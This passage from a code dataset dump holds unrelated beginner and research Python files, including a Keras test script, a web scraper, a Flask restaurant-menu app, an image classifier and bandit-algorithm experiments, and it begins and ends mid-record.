sin_gif()\n\n\n","sub_path":"Matplotlib/animation_gif.py","file_name":"animation_gif.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"420264707","text":"#from keras.datasets import mnist\nfrom keras.models import load_model\n\n#from keras.datasets import mnist\nimport csv\nimport numpy as np\n\nimport sys\n#####################################\n\n# GPU memory limit #\n\n#####################################\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n#from keras.backend.tensorflow_backend import set_session\n#config = tf.ConfigProto()\n#config.gpu_options.per_process_gpu_memory_fraction = 0.25\n#set_session(tf.Session(config=config))\n\n#<testing data> <prediction file> <mode>\ndef load_test():\n x_test = []\n row_count = 0\n with open(sys.argv[1],'r') as file:\n csvfile = csv.reader(file,delimiter=',')\n for row in csvfile:\n if (row_count!=0):\n x_test.append([])\n x_test[row_count-1]= row[1].split(\" \")\n for i in range(len(x_test[row_count-1])):\n x_test[row_count-1][i]=float(x_test[row_count-1][i])\n row_count +=1\n x_test = np.array(x_test).reshape(-1,48,48,1)\n\n x_test = x_test/255\n return (x_test)\n\nx_test = load_test()\n\nif sys.argv[3]=='public':\n\tmodel = load_model(\"model69.h5\")\nelif sys.argv[3]=='private':\n\tmodel = load_model(\"model68.h5\")\n\n#model = load_model(\"model69.h5\")\n\n\ny_test=model.predict(x_test)\ny_test=np.argmax(y_test,axis=-1)\nwith open(sys.argv[2],'w') as f:\n print(\"id,label\",file=f)\n print('\\n'.join(['{},{}'.format(i, p) for (i, p) in enumerate(y_test)]), file=f)\n \n\nprint (\"\\n Test Accuracy:\")#,result)\n\n\n\n\n","sub_path":"hw3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"359668958","text":"from random import randint\r\n\r\n\r\ndef is_int(x):\r\n if x[0] == \"-\":\r\n return x[1:].isdigit()\r\n else:\r\n return x.isdigit()\r\n\r\nm = input(\"Введіть розмір матриці A(m×m), m > 1\\nm = \")\r\ndown_num, up_num = 
input(\"Введіть мінімальне ціле значення числа у матриці: \"), input(\"та максимальне ціле значення: \")\r\n\r\nif m.isdigit() and int(m) > 1 and is_int(down_num) and is_int(up_num):\r\n m = int(m)\r\n s = (\"{:\"+str(max(len(down_num), len(up_num))+3)+\"}\")*m\r\n down_num, up_num = int(down_num), int(up_num)\r\n if up_num > down_num:\r\n A = [[randint(down_num, up_num) for i in range(m)] for k in range(m)]\r\n print(\"Згенерована матриця:\")\r\n for i in A:\r\n print(s.format(*i))\r\n\r\n B = zip(*(sorted(A[i], reverse=True) for i in range(m)))\r\n print(\"Сформована нова матриця:\")\r\n for i in B:\r\n print(s.format(*i))\r\n else:\r\n print(\"Максимальне значення повине бути більше мінімального\")\r\nelse:\r\n print(\"m повина бути цілим числом більше 1, а числа - цілими\")\r\n","sub_path":"I семестр/Програмування (Python)/Лабораторні/Лисенко 6116/Python/Лабораторна 4/Завдання 2.py","file_name":"Завдання 2.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"57238905","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pprint\r\n\r\nres = requests.get(\"https://news.ycombinator.com/news\")\r\nres2 = requests.get(\"https://news.ycombinator.com/news?p2\")\r\n#print(res.text)\r\nsoup = BeautifulSoup(res.text,'html.parser')\r\nsoup2 = BeautifulSoup(res2.text, 'html.parser')\r\n#print(soup.body.contents)\r\n\r\nlinks = soup.select('.storylink')\r\nlinks2 = soup2.select('.storylink')\r\nsubtext = soup.select('.subtext')\r\nsubtext2 = soup2.select('.subtext')\r\n#print(links)\r\n\r\nmega_link = links + links2\r\nmega_subtext = subtext + subtext2\r\n\r\ndef sorted_by_votes(hnlist):\r\n return sorted(hnlist,key= lambda k:k['vote'],reverse=True)\r\n\r\ndef create_custom_hn(links,subtext):\r\n hn=[]\r\n for idx,item in enumerate(links):\r\n title = links[idx].getText()\r\n href = links[idx].get('href', None)\r\n vote = subtext[idx].select('.score')\r\n if len(vote):\r\n points = int(vote[0].getText().replace(' points',''))\r\n if points>99:\r\n hn.append({'title':title, 'href':href, 'vote': points})\r\n return sorted_by_votes(hn)\r\n\r\npprint.pprint(create_custom_hn(mega_link,mega_subtext))","sub_path":"scrp.py","file_name":"scrp.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"20281229","text":"import numpy as np\n\ndef MLP(X,Wh,Wo):\n '''%-----------\n %INITIALIZE\n %-----------''';\n a = 1.7159\n b = 2/3.\n N = len(X[0,:]) #%number of training data pts\n bias = -1 # %initial bias value\n O=[]\n X = np.concatenate((bias*np.ones([1,N]) , X),axis=0) #%add zero'th order terms\n H=[]\n for j in range(len(Wh)):\n H.append(len(Wh[j]))\n \n \n '''\n %-----\n %MAIN\n %-----\n\n %-------------------------------------------------\n %PROPAGATE INPUTS FORWARD\n %-------------------------------------------------\n %------------------------\n %HIDDEN LAYER\n %------------------------''';\n \n for j in range(len(H)): #%loop over each hidden layer\n if j==0:\n V = Wh[j]@X #%weighted sum of inputs [1] Eqn(4.29/30)\n else:\n V = Wh[j]@O[j-1] #%weighted sum of hidden inputs [1] Eqn(4.29/31)\n \n PHI = a * np.tanh(b*V) #%acivation function [1] Eqn(4.37)\n O.append( np.concatenate((bias*np.ones([1,N]),PHI),axis=0)) #%add zero'th order terms\n \n\n '''%------------------------\n %OUTPUT LAYER\n %------------------------''';\n V = Wo@O[-1] #%weighted sum of inputs [1] Eqn(4.29)\n Y = a * np.tanh(b*V) 
#%activation function [1] Eqn(4.37)\n\n return Y\n","sub_path":"EE565/Project4_GarciaJ/codes/requiredFunctions/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335944540","text":"# 02_del_repeat.py\n\n# 练习:\n# 任意输入一个单词,存入集合中,当输入空字符时结束输入,\n# 1) 打印您输入的单词的种类数(去重)\n# 2) 每个单词都打印在终端上显示\n# 思考:\n# 如何让打印的次序和输入的次序一致?\n \nL = []\n\nwhile True:\n s = input(\"请输入单词:\")\n if not s:\n break\n L.append(s)\n\n\ns = set(L) # 集合可以去重\nprint(\"您共输入%d种单词\" % len(s))\nfor words in s:\n print(words)\n\n#方法1,不用集合\n# L2 = []\n# for x in L:\n# if x not in L2: #如果x没有加入到L2中,说明是第一次出现\n# L2.append(x)\n\n# for x in L2:\n# print(x)\n\n\n\n#方法2,用集合\ns = set(L) #去重\nfor x in L:\n if x in s:\n print(x)\n s.discard(x) #删除已经打印过的","sub_path":"python语法/day8/exercise/02_del_repeat.py","file_name":"02_del_repeat.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"571174294","text":"from flask import Flask\nfrom flask import request, render_template, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n# Making an API Endpoint (GET Request)\n@app.route('/restaurants/<int:restaurant_id>/menu/JSON')\ndef restaurantMenuJSON(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(\n id=restaurant_id).one()\n items = session.query(MenuItem).filter_by(\n restaurant_id=restaurant_id).all()\n return jsonify(MenuItems=[i.serialize for i in items])\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/JSON/')\ndef restaurantMenuItemJSON(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id = menu_id).one()\n return jsonify(menuItem.serialize)\n\n\n@app.route('/')\ndef homePage():\n restaurants = session.query(Restaurant).all()\n output =''\n output = '<ul>'\n for restaurant in restaurants:\n output += '<li>'\n output += '<a href=\"/restaurants/%s/\">' %restaurant.id \n output += restaurant.name\n output += '</a>'\n output += '</li>'\n output += '</ul>'\n return output\n\n@app.route('/restaurants/<int:restaurant_id>/')\ndef restaurantMenu(restaurant_id):\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n items = session.query(MenuItem).filter_by(restaurant_id = restaurant_id)\n return render_template('menu.html', restaurant=restaurant, items=items)\n\n# Create functions to newMenuItem, editMenuItem and deleteMenuItem...\n\n@app.route('/restaurant/<int:restaurant_id>/add', methods=['GET', 'POST'])\ndef newMenuItem(restaurant_id):\n if request.method == 'POST':\n newItem = MenuItem(name = request.form['name'], restaurant_id = restaurant_id)\n session.add(newItem)\n session.commit()\n flash('new menu item created!')\n return redirect(url_for('restaurantMenu', restaurant_id = restaurant_id))\n else:\n return render_template('newmenuitem.html', restaurant_id = restaurant_id)\n \n@app.route('/restaurant/<int:restaurant_id>/<int:menu_id>/edit', methods=['GET', 'POST'])\ndef editMenuItem(restaurant_id, menu_id):\n editedItem = session.query(MenuItem).filter_by(id=menu_id).one()\n if request.method == 'POST':\n if request.form['name']:\n editedItem.name = 
request.form['name']\n session.add(editedItem)\n session.commit()\n flash('The item has been edited!')\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template(\n 'editmenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=editedItem)\n\n\n@app.route('/restaurant/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])\ndef deleteMenuItem(restaurant_id, menu_id):\n menuItem = session.query(MenuItem).filter_by(id = menu_id).one()\n if request.method == 'POST':\n session.delete(menuItem)\n session.commit()\n flash('Say goodbye to your little friend!')\n return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))\n else:\n return render_template(\n 'deletemenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=menuItem)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key' # Flask uses this to create sessions\n app.debug = True\n app.run(host = '0.0.0.0', port = 5000)","sub_path":"source/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13064445","text":"# -*- coding: utf-8 -*-\n__author__ = \"taw\"\n\nimport commands\n\nfrom flaskext.AuthManager.authmanager import get_current_user_cli\nfrom flaskext.tawrestful import Resource\nfrom pycli.utils.timer import normal_time, uptime_str\nfrom .. import api\n\n# 产品名称:产品型号\nPRODUCT_NAME_TO_MODEL = {\"TA_NET\":\"天融信网络审计系统\", \"TA_DB\":\"天融信数据库审计系统\"}\n#匹配条件\nMATCHING_PATTERN1 = \"TA_NET=enable\"\nMATCHING_PATTERN2 = \"TA_DB=enable\"\n\nclass SystemInfo(Resource):\n def __init__(self):\n self.cli = get_current_user_cli()\n\n def get(self):\n system_info = {\n \"license\":self.cli(\"system license version\"),\n \"devname\":self.cli(\"system devname show\"),\n \"timout\":self.cli(\"system webui show\"),\n \"sn\":self.cli(\"system product sn\")\n }\n\n ret = {}\n\n for cmd_k, cmd_v in system_info.iteritems():\n if cmd_v and \"code\" in cmd_v and cmd_v[\"code\"] != \"200\":\n return {\"success\":False, \"msg\":\"Cli(%s) show cmd error:%s\" % (cmd_k, cmd_v)}\n\n ret.update(cmd_v)\n\n system_license = self.cli(\"system license show\")\n if system_license:\n if MATCHING_PATTERN1 in system_license.get(\"license_info\").split(\"\\n\"):\n pattern_name = MATCHING_PATTERN1.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n elif MATCHING_PATTERN2 in system_license.get(\"license_info\").split(\"\\n\"):\n pattern_name = MATCHING_PATTERN2.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n else:\n pattern_name = MATCHING_PATTERN1.split(\"=\")[0]\n ret[\"model\"] = pattern_name.replace(\"_NET\", \"-Net\")\n ret[\"name\"] = PRODUCT_NAME_TO_MODEL[pattern_name]\n\n ret[\"version\"] = \"V3\"\n\n return ret, 200\n\n# 系统时间与系统运行时间相关接口\nclass SystemUptime(Resource):\n def get(self):\n timezone = commands.getoutput(\"date | awk '{print $5}'\")\n normaltime = normal_time()\n\n systime = timezone + \" \" + normaltime\n uptime = uptime_str()\n\n ret = {}\n ret[\"systime\"] = systime\n ret[\"uptime\"] = uptime\n\n return ret, 200\n\napi.add_resource(SystemInfo, \"/systemmanage/system_setting/systeminfo\")\napi.add_resource(SystemUptime, 
\"/systemmanage/system_setting/systemuptime\")\n","sub_path":"modules/api/restful/systemmanage/system_setting/systeminfo.py","file_name":"systeminfo.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"337738886","text":"def longest_palindromic_substring(s): # banana\r\n\tif len(s) == 0: return s\r\n\r\n\tlength = len(s) # 6\r\n\tmid = 0\r\n\tmax_substring_length = 0\r\n\tfinal_palindrome = \"\"\r\n\r\n\twhile mid < length: # 0 < 6 # 1 < 6 # 2\r\n\t\tcurrent_palindrome = longest_palindrome(s, mid) # b # a\r\n\t\tif len(current_palindrome) > max_substring_length: # 1 > 0\r\n\t\t\tmax_substring_length = len(current_palindrome) # 1\r\n\t\t\tfinal_palindrome = current_palindrome # \"b\"\r\n\t\tmid += 1\r\n\r\n\treturn final_palindrome\r\n\r\ndef longest_palindrome(s, mid): # s, 0 # s, 1, # s, 2\r\n\tfinal_palindrome = s[mid] # \"b\" # a # n # ana\r\n\tstart = mid - 1 # -1 # 0 # 1\r\n\tend = mid + 1 # 1 # 2 # 3\r\n\twhile start >= 0 and end < len(s):\r\n\t\tpalindrome = s[start:end+1] # ana\r\n\t\t# if is_palindrome(palindrome): \r\n\t\tif s[start] == s[end]:\r\n\t\t\t# final_palindrome = palindrome # ana\r\n\t\t\tfinal_palindrome = s[start:end+1]\r\n\t\t\tstart -= 1 # 0\r\n\t\t\tend += 1 # 4\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn final_palindrome # b # a \r\n\r\n# def is_palindrome(s):\r\n# \ti, j = 0, len(s) - 1\r\n# \twhile i < j:\r\n# \t\tif s[i] != s[j]:\r\n# \t\t\treturn False\r\n# \t\ti+=1\r\n# \t\tj-=1\r\n# \treturn True\r\n\t\t\r\nprint(longest_palindromic_substring(\"banana\"))\r\n\r\n# solve it using dynamic programming","sub_path":"leetcode3_longestPalindromicSubstring.py","file_name":"leetcode3_longestPalindromicSubstring.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201854140","text":"import numpy as np \r\nimport networkx as nx\r\nimport seaborn as sns\r\nsns.set_style(\"white\")\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics.pairwise import rbf_kernel\r\nfrom sklearn.preprocessing import Normalizer, MinMaxScaler\r\nfrom scipy.sparse import csgraph \r\nimport scipy\r\nimport os \r\nos.chdir('/Kaige_Research/Code/graph_bandit/code/')\r\nfrom sklearn import datasets\r\nfrom linucb import LINUCB\r\nfrom gob import GOB \r\nfrom colin import COLIN\r\nfrom lapucb import LAPUCB\r\nfrom lapucb_sim import LAPUCB_SIM\r\nfrom sclub import SCLUB\r\nfrom club import CLUB\r\nfrom utils import *\r\nfrom sklearn.decomposition import NMF\r\nfrom Recommender.matrix_factor_model import ProductRecommender\r\ninput_path='../processed_data/delicious/'\r\npath='../bandit_results/delicious/'\r\n\r\nuser_feature_matrix=np.load(input_path+'binary_payoff_user_feature_matrix_100.npy')\r\nitem_feature_matrix=np.load(input_path+'binary_payoff_item_feature_matrix_500.npy')\r\nrating_matrix=np.load(input_path+'binary_rating_matrix_100_user_500_bookmark.npy')\r\nrating_matrix_mask=np.load(input_path+'binary_rating_mask_100_user_500_bookmark.npy')\r\nuser_num=30\r\nuser_feature_matrix=user_feature_matrix[:user_num]\r\ntrue_payoffs=np.dot(user_feature_matrix, item_feature_matrix.T)\r\n\r\n# true_rating=rating_matrix[:user_num]\r\n# mask=rating_matrix_mask[:user_num]\r\n# true_rating_matrix=true_rating*mask\r\n# true_payoffs=true_payoffs*(1-mask)\r\n# true_payoffs=true_payoffs+true_rating_matrix\r\ntrue_payoffs[true_payoffs>=0.5]=1.0\r\ntrue_payoffs[true_payoffs<0.5]=0.0\r\n# a=true_payoffs.ravel()\r\n# 
plt.plot(a, '.')\r\n# plt.show()\r\n\r\ndimension=item_feature_matrix.shape[1]\r\nitem_num=item_feature_matrix.shape[0]\r\npool_size=10\r\niteration=3000\r\nsigma=0.1# noise\r\ndelta=0.01# high probability\r\nalpha=1# regularizer\r\nalpha_2=0.01# edge delete CLUB\r\nbeta=0.1 # exploration for CLUB, SCLUB and GOB\r\nthres=0.0\r\nk=3 # edge number each node SCLUb to control the sparsity\r\nstate=True\r\nloop=1\r\n\r\ntrue_adj=rbf_kernel(user_feature_matrix, gamma=0.5)\r\nnoise_matrix=np.zeros((user_num, item_num))\r\nuser_seq=np.random.choice(range(user_num), size=iteration)\r\nitem_pool_seq=np.random.choice(range(item_num), size=(iteration, pool_size))\r\n\r\nlinucb_regret_matrix=np.zeros((loop, iteration))\r\nlinucb_error_matrix=np.zeros((loop, iteration))\r\ngob_regret_matrix=np.zeros((loop, iteration))\r\ngob_error_matrix=np.zeros((loop, iteration))\r\nlapucb_regret_matrix=np.zeros((loop, iteration))\r\nlapucb_error_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_regret_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_error_matrix=np.zeros((loop, iteration))\r\nclub_regret_matrix=np.zeros((loop, iteration))\r\nclub_error_matrix=np.zeros((loop, iteration))\r\ngob_graph_matrix=np.zeros((loop, iteration))\r\nlapucb_graph_matrix=np.zeros((loop, iteration))\r\nlapucb_sim_graph_matrix=np.zeros((loop, iteration))\r\n\r\n\r\nfor l in range(loop):\r\n\tlinucb_model=LINUCB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs, alpha, delta, sigma, state)\r\n\tgob_model=GOB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, alpha, delta, sigma, beta, state)\r\n\tlapucb_model=LAPUCB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, noise_matrix, alpha, delta, sigma, beta, thres, state)\r\n\tlapucb_sim_model=LAPUCB_SIM(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs,true_adj, noise_matrix, alpha, delta, sigma, beta, thres, state)\r\n\tclub_model = CLUB(dimension, user_num, item_num, pool_size, item_feature_matrix, user_feature_matrix, true_payoffs, alpha, alpha_2, delta, sigma, beta, state)\r\n\r\n\tlinucb_regret, linucb_error, linucb_beta=linucb_model.run(user_seq, item_pool_seq, iteration)\r\n\tgob_regret, gob_error, gob_beta, gob_graph=gob_model.run(user_seq, item_pool_seq, iteration)\r\n\tlapucb_regret, lapucb_error, lapucb_beta, lapucb_graph=lapucb_model.run(user_seq, item_pool_seq, iteration)\r\n\tlapucb_sim_regret, lapucb_sim_error, lapucb_sim_beta, lapucb_sim_graph=lapucb_sim_model.run(user_seq, item_pool_seq, iteration)\r\n\tclub_regret, club_error, club_cluster_num, club_beta=club_model.run(user_seq, item_pool_seq, iteration)\r\n\r\n\tlinucb_regret_matrix[l], linucb_error_matrix[l]=linucb_regret, linucb_error\r\n\tgob_regret_matrix[l], gob_error_matrix[l], gob_graph_matrix[l]=gob_regret, gob_error, gob_graph\r\n\tlapucb_regret_matrix[l], lapucb_error_matrix[l], lapucb_graph_matrix[l]=lapucb_regret, lapucb_error, lapucb_graph\r\n\tlapucb_sim_regret_matrix[l], lapucb_sim_error_matrix[l], lapucb_sim_graph_matrix[l]=lapucb_sim_regret, lapucb_sim_error, lapucb_sim_graph\r\n\tclub_regret_matrix[l], club_error_matrix[l]=club_regret, club_error\r\n\r\n\r\n\tlinucb_regret=np.mean(linucb_regret_matrix, axis=0)\r\n\tlinucb_error=np.mean(linucb_error_matrix, axis=0)\r\n\r\n\tgob_regret=np.mean(gob_regret_matrix, axis=0)\r\n\tgob_error=np.mean(gob_error_matrix, 
axis=0)\r\n\tgob_graph=np.mean(gob_graph_matrix, axis=0)\r\n\r\n\tlapucb_regret=np.mean(lapucb_regret_matrix, axis=0)\r\n\tlapucb_error=np.mean(lapucb_error_matrix, axis=0)\r\n\tlapucb_graph=np.mean(lapucb_graph_matrix, axis=0)\r\n\r\n\tlapucb_sim_regret=np.mean(lapucb_sim_regret_matrix, axis=0)\r\n\tlapucb_sim_error=np.mean(lapucb_sim_error_matrix, axis=0)\r\n\tlapucb_sim_graph=np.mean(lapucb_sim_graph_matrix, axis=0)\r\n\tclub_regret=np.mean(club_regret_matrix, axis=0)\r\n\tclub_error=np.mean(club_error_matrix, axis=0)\r\n\r\n\r\nplt.figure(figsize=(5,5))\r\nplt.plot(linucb_regret,'-.', label='LinUCB')\r\nplt.plot(gob_regret, label='GOB', color='orange')\r\nplt.plot(lapucb_regret, '-*', markevery=0.1, label='G-UCB')\r\nplt.plot(lapucb_sim_regret, '-s', markevery=0.1, label='G-UCB SIM')\r\nplt.plot(club_regret, label='CLUB')\r\nplt.ylabel('Cumulative Regret', fontsize=12)\r\nplt.xlabel('Time', fontsize=12)\r\nplt.legend(loc=2, fontsize=10)\r\nplt.tight_layout()\r\nplt.savefig(path+'regret_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.png', dpi=300)\r\nplt.savefig(path+'regret_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.eps', dpi=300)\r\nplt.show()\r\n\r\n\r\nplt.figure(figsize=(5,5))\r\nplt.plot(linucb_error,'-.', label='LinUCB')\r\nplt.plot(gob_error, label='GOB')\r\nplt.plot(lapucb_error, '-*', markevery=0.1, label='G-UCB')\r\nplt.plot(lapucb_sim_error, '-s', markevery=0.1, label='G-UCB SIM')\r\nplt.plot(club_error, label='CLUB')\r\nplt.ylabel('Error', fontsize=12)\r\nplt.xlabel('Time', fontsize=12)\r\nplt.legend(loc=1, fontsize=10)\r\nplt.tight_layout()\r\nplt.savefig(path+'error_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.png', dpi=300)\r\nplt.savefig(path+'error_delicious_user_num_%s_item_num_%s'%(user_num, item_num)+'.eps', dpi=300)\r\nplt.show()\r\n\r\n\r\n","sub_path":"bandit_implement_delicious.py","file_name":"bandit_implement_delicious.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624051362","text":"num = int(input('Enter the number : '))\r\na=0\r\nz=1\r\nx=0\r\nprint( a ,\"\\n\", z )\r\nfor i in range(num-2):\r\n x = a + z\r\n a = z\r\n z = x\r\n print(x)","sub_path":"fibbonnaci.py","file_name":"fibbonnaci.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110691931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 11 01:16:28 2016\n\n@author: Wil\n\"\"\"\nimport cv2\nimport numpy as np\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimage_paths = []\npath = \"Sorted/\"\n\n#list of our class names\ntraining_names = os.listdir(path)\n\ntraining_paths = []\nnames_path = []\n#get full list of all training images\nfor p in training_names:\n training_paths1 = os.listdir(path+p)\n for j in training_paths1:\n training_paths.append(path+p+\"/\"+j)\n names_path.append(p)\n\nsift = cv2.SIFT()\ndescriptors_unclustered = []\ndictionarySize = 5\nBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\nfor p in training_paths:\n image = cv2.imread(p)\n gray = cv2.cvtColor(image, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n kp, dsc= sift.detectAndCompute(gray, None)\n BOW.add(dsc)\n\n#dictionary created\ndictionary = BOW.cluster()\n\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks=50) # or pass empty dictionary\nflann = cv2.FlannBasedMatcher(index_params,search_params)\nsift2 = 
cv2.DescriptorExtractor_create(\"SIFT\")\nbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\nbowDiction.setVocabulary(dictionary)\n\ntrain_desc = []\ntrain_labels = []\ni = 0\nfor p in training_paths:\n img = cv2.imread(p, 1)\n gray = cv2.cvtColor(img, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n feature = bowDiction.compute(gray, sift.detect(gray))\n train_desc.extend(feature)\n if names_path[i]=='Liberty':\n train_labels.append(1)\n if names_path[i]=='Lincoln':\n train_labels.append(2)\n if names_path[i]=='Monument':\n train_labels.append(3)\n if names_path[i]=='Pisa':\n train_labels.append(4)\n i = i+1\n\nprint(\"svm items\", len(train_desc), len(train_desc[0]))\ncount=0\nsvm = cv2.SVM()\nsvm.train(np.array(train_desc), np.array(train_labels))\n\nactual=[]\npredicted=[]\ndef classify(fil):\n img = cv2.imread(fil, 1)\n gray = cv2.cvtColor(img, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n feature = bowDiction.compute(gray, sift.detect(gray))\n p = svm.predict(feature)\n predicted.append(int(p))\n actual.append(train_labels[count])\n \n \n\nfor p in training_paths:\n classify(p)\n count+=1\n\ny_actu = pd.Series(actual, name='Actual')\ny_pred = pd.Series(predicted, name='Predicted')\ndf_confusion = pd.crosstab(y_actu, y_pred, rownames=['Actual'], colnames=['Predicted'], margins=True)\ndf_conf_norm = df_confusion / df_confusion.sum(axis=1)\n\ndef plot_confusion_matrix(df_confusion, title='Confusion matrix', cmap=plt.cm.gray_r):\n plt.matshow(df_confusion, cmap=cmap) # imshow\n #plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(df_confusion.columns))\n plt.xticks(tick_marks, df_confusion.columns, rotation=45)\n plt.yticks(tick_marks, df_confusion.index)\n #plt.tight_layout()\n plt.ylabel(df_confusion.index.name)\n plt.xlabel(df_confusion.columns.name)\n\nprint(df_confusion)\nplot_confusion_matrix(df_conf_norm)\n","sub_path":"Presentation.py","file_name":"Presentation.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181062704","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport click\nfrom modelosqlite3 import *\n\nBD = \"biblioteca.sqlite3\"\n\n@click.group()\ndef crud():\n parametros_bd(BD)\n\n@crud.command()\n@click.argument(\"nombre\")\n@click.argument(\"ap-paterno\")\n@click.argument(\"ap-materno\", required=False)\ndef c_autor(nombre, ap_paterno, ap_materno):\n \"\"\" Inserta un registro en la tabla Autor \"\"\"\n # Variables que definen que insertar y en que tabla se insertan\n tabla = \"Autor\"\n valores = (nombre, ap_paterno, ap_materno)\n # Se realiza la inserción del registro\n inserta_registro(tabla, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha insertado el registro {} en la tabla {}\".format(\n valores, tabla))\n\ndef imprime_texto(registros):\n \"\"\" Imprime la lista de registros en la salida estándar en formato texto \"\"\"\n # Se obtiene el ancho máximo de cada columna\n anchos = [[len(str(c)) for c in f] for f in registros]\n anchos = [max(f) for f in zip(*anchos)]\n\n # Se imprime la tabla de resultados\n for fila in registros:\n # Se remplaza los campos vaciós por cademas vacías.\n fila = [c if c != None else \"\" for c in fila]\n # A cada campo se agrega el valor del ancho\n fila = tuple(zip(fila, anchos))\n # A cada campo se le dá formato\n fila = [\"{:{}}\".format(*c) for c in fila]\n # Se fusionan los campos en una cadena y se imprimen\n print(\" | \".join(fila))\n\n@crud.command()\ndef r_autor():\n \"\"\" Imprime la lista de 
registros de la tabla Autor \"\"\"\n # Se obtiene la lista de registros de la tabla Autor\n registros = obtiene_registros(\"Autor\")\n # Se imprimen los registros en formato texto en la salida estándar\n imprime_texto(registros)\n\n@crud.command()\n@click.argument(\"id\")\n@click.argument(\"campo\")\n@click.argument(\"valor\")\ndef u_autor(id, campo, valor):\n \"\"\" Actualiza los datos de un Autor \"\"\"\n # Variables necesarias para actualizar un campo en un registro\n tabla = \"Autor\"\n valores = (valor, id)\n actualiza_registro(tabla, campo, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha actualizado el registro {} en la tabla {}\".format(id, tabla))\n\n@crud.command()\n@click.argument(\"id\")\ndef d_autor(id):\n \"\"\" Elimina un registro de un Autor \"\"\"\n # Variables necesarias para eliminar un campo en un registro\n tabla = \"Autor\"\n valores = (id,)\n elimina_registro(tabla, valores)\n\n # Se muestra un mensaje al usuario\n print(\"Se ha eliminado el registro {} en la tabla {}\".format(id, tabla))\n\n\nif __name__ == '__main__':\n crud()\n","sub_path":"Clase-05/Ejemplo-05/biblioteca-crud.py","file_name":"biblioteca-crud.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"142288074","text":"import json\n\nfrom mongoengine import NotUniqueError, DoesNotExist\nfrom telebot import TeleBot\nfrom telebot.types import ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton, Update\nfrom flask import Flask, 